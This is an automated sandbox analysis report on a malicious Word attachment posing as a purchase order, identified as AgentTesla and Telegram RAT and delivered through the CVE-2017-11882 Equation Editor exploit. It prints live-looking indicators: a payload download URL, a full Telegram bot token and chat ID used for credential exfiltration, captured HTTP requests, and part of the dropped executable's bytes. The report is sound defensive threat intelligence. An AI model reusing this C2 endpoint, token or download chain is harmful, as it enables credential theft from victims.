Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Purchase Order_0131021.doc

Overview

General Information

Sample Name:Purchase Order_0131021.doc
Analysis ID:502700
MD5:fc66be4a9696798aff0be8ed97bd294f
SHA1:cf158b670ec831531a233d41872d1a9ee3850ff1
SHA256:8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 236 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 512 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • gudostrp.exe (PID: 1212 cmdline: C:\Users\user\AppData\Roaming\gudostrp.exe MD5: BC5F0AA0262021DB5921D726F7A5B820)
      • gudostrp.exe (PID: 2576 cmdline: C:\Users\user\AppData\Roaming\gudostrp.exe MD5: BC5F0AA0262021DB5921D726F7A5B820)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.gudostrp.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.gudostrp.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                4.2.gudostrp.exe.31ca110.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.gudostrp.exe.31ca110.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    4.2.gudostrp.exe.3200330.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 144.76.47.167, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 512, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 512, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\gudostrp.exe, CommandLine: C:\Users\user\AppData\Roaming\gudostrp.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\gudostrp.exe, NewProcessName: C:\Users\user\AppData\Roaming\gudostrp.exe, OriginalFileName: C:\Users\user\AppData\Roaming\gudostrp.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 512, ProcessCommandLine: C:\Users\user\AppData\Roaming\gudostrp.exe, ProcessId: 1212

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.2.gudostrp.exe.400000.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}
                      Source: gudostrp.exe.2576.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Purchase Order_0131021.docVirustotal: Detection: 36%Perma Link
                      Source: Purchase Order_0131021.docReversingLabs: Detection: 35%
                      Antivirus detection for URL or domainShow sources
                      Source: http://palangavra.lt/jukiestay/gufoxqa.exeAvira URL Cloud: Label: malware
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2
                      Source: global trafficDNS query: name: palangavra.lt
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 144.76.47.167:80
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 149.154.167.220:443

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                      Source: global trafficHTTP traffic detected: POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Oct 2021 08:22:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 14 Oct 2021 01:10:12 GMTAccept-Ranges: bytesContent-Length: 486912Keep-Alive: timeout=5, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 82 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 a4 e7 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 73 07 00 53 00 00 00 00 80 07 00 d4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 90 a8 06 00 58 cb 00 00 02 00 00 00 5c 00 00 06 b0 45 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 0d 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 08 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 0d 01 00 06 72 f3 45 00 70 7e 3d 00 00 04 02 28 0d 01 00 06 28 13 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 00 01 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 0d 01 00 06 72 f7 45 00 70 7e 42 00 00 04
                      Source: global trafficHTTP traffic detected: GET /jukiestay/gufoxqa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: palangavra.ltConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: gudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmpString found in binary or memory: http://SwonTwAJYn3XCAV3.net
                      Source: gudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: gudostrp.exe, 00000005.00000002.723083857.00000000060F3000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: http://yBlQIu.com
                      Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/
                      Source: gudostrp.exe, 00000005.00000002.722105371.0000000000788000.00000004.00000020.sdmp, gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocumentdocument-----
                      Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgP
                      Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmpJump to behavior
                      Source: unknownDNS traffic detected: queries for: palangavra.lt
                      Source: global trafficHTTP traffic detected: GET /jukiestay/gufoxqa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: palangavra.ltConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\gudostrp.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exeJump to dropped file
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.2.gudostrp.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bCB2C1C74u002d7A68u002d46F5u002dB599u002d45991AE15A88u007d/A406E5E7u002dDEBAu002d4106u002dAAAEu002dB593294D8F00.csLarge array initialization: .cctor: array initializer size 12005
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030348D
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_00308ED7
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_00721D30
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FA5EA8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FA0006
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB5720
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FC0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FC5620
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FC929C
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD90FD
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD5908
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD0006
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_02025CE8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_020319A2
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041D0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041DE168
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030364F
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB0006
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00256048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0025F2B8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00255430
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0025D458
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00255778
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0025AF40
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00252197
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00559C40
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_005502F1
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_005537E8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00556E48
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00559468
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0055B520
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00553F9D
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_00726CD0 CreateProcessAsUserW,
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76E90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76E90000 page execute and read and write
                      Source: Purchase Order_0131021.docVirustotal: Detection: 36%
                      Source: Purchase Order_0131021.docReversingLabs: Detection: 35%
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rchase Order_0131021.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD1AF.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@6/9@3/2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: gudostrp.exe.2.dr, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: gufoxqa[1].exe.2.dr, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
